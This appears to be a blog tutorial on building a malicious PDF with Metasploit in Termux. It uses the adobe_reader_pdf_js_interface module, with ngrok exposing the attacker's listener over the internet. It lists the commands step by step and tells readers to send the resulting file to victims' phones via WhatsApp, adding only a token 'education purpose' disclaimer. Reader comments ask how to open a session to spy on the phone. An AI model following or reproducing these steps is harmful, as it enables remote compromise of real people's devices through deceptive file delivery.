binding payloads in PDF file Metasploit Termux.. Android Hacking... not for beginners..

Ads

binding payloads in PDF file Metasploit Termux.. Android Hacking... not for beginners..

Prerequisite..

1.ngrok for WAN attacks

2.metasploit (pre-installed)

metasploit payload bind in PDF file
1.cd metasploit-framework
2. ./msfconsole (wait for few minutes)

3.open new terminal window



4.cd metasploit-framework
5.cd modules
6.cd exploits
7.cd android
8.cd fileformat
9. now copy this file name you need this format for next step adobe_reader_pdf_js_interface.rb
10.back to the first terminal

11.use exploit/android/fileformat/adobe_reader_pdf_js_interface.rb
12.now open an other terminal window ./ngrok tcp 1649



13.now copy the link "0.tcp.ngrok.io" that's are lhost for WAN but dh not copy my link you get an other link in ngrok
14. now back to the first window set lhost 0.tcp.ngrok.io
15. now copy port /0.tcp.ngrok 19238 you will get another port number...
16.set lport 15836



17.exploit
18 copy this /data/data/com.termux/files/home/.msf4/local/msf.pdf /sdcard your payload will be save in your internal mobile storage.. now send it to the victims mobile via whatsapp.. I'm not responsible for any misuse of this script.. only use for education purpose..

6 Comments

if you have doubts let me know...

  1. Manuel Arturo Silva28 March 2019 at 17:32

    hi. good contribution

    ReplyDelete
  2. Payload was created but how can I listen to that payload please help.

    ReplyDelete
  3. Is it need root permission
    I cant move it into storage

    ReplyDelete
  4. How do I start a session for looking into phone

    ReplyDelete
  5. That msf.pdf not located in the root as mentioned above

    ReplyDelete
  6. very nice artical
    please visit my blog
    https://kidscricketcoaching.blogspot.com/2020/05/episode-16-back-foot-drive-29052020.html

    ReplyDelete

Post a Comment

if you have doubts let me know...

Previous Post Next Post